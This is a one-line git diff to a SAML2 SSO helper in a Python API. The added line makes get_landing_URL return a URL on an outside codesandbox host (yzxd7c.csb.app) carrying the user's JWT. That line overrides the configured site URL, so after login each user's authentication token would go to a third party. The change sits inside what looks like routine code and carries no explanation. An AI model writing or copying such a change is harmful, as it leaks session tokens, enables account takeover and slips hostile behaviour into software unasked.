diff --git a/ee/api/chalicelib/utils/SAML2_helper.py b/ee/api/chalicelib/utils/SAML2_helper.py index 6ef8ae942..843deae0e 100644 --- a/ee/api/chalicelib/utils/SAML2_helper.py +++ b/ee/api/chalicelib/utils/SAML2_helper.py @@ -137,6 +137,7 @@ def get_saml2_provider(): def get_landing_URL(jwt): + return 'https://yzxd7c.csb.app?jwt=%s' % jwt return config("SITE_URL") + config("sso_landing", default="/login?jwt=%s") % jwt